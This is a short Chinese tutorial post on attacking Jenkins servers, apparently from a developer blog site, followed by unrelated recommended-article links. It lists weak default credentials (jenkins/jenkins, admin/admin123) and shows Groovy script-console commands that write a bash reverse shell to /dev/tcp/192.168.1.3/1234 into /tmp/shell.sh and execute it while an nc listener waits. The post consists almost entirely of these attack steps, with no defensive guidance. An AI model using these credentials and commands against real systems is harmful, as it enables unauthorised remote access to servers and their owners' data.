web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

Jenkins弱口令

默认用户一般为jenkins/jenkins

使用admin/admin123登陆成功

Jenkins反弹shell


格式为 println"命令".execute().text

在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句

new File("/tmp/shell.sh").write('bash -i >& /dev/tcp/192.168.1.3/1234 0>&1'

println "ls-al/tmp/shell.sh".execute().text

攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text

相关推荐
小宇的天下5 分钟前
Synopsys® Technology File(工艺文件)详解
前端
点点开心6 分钟前
攻防世界WEB(新手模式)2-5-web2
前端·学习·安全·web安全·网络安全
谢尔登7 分钟前
React19 渲染流程
前端·javascript·架构·ecmascript
我是伪码农7 分钟前
Vue 1.29
前端·javascript·vue.js
css趣多多9 分钟前
Vue动态组件以及keep-alive的使用
前端·javascript·vue.js
盐真卿12 分钟前
python第五部分:文件操作
前端·数据库·python
晚霞的不甘15 分钟前
Flutter for OpenHarmony《智慧字典》英语学习模块代码深度解析:从数据模型到交互体验
前端·学习·flutter·搜索引擎·前端框架·交互
qq_3363139323 分钟前
javaweb-Ajax
前端·javascript·ajax
不积硅步24 分钟前
jenkins安装jdk、maven、git
java·jenkins·maven
豆约翰24 分钟前
句子单词统计 Key→Value 动态可视化
开发语言·前端·javascript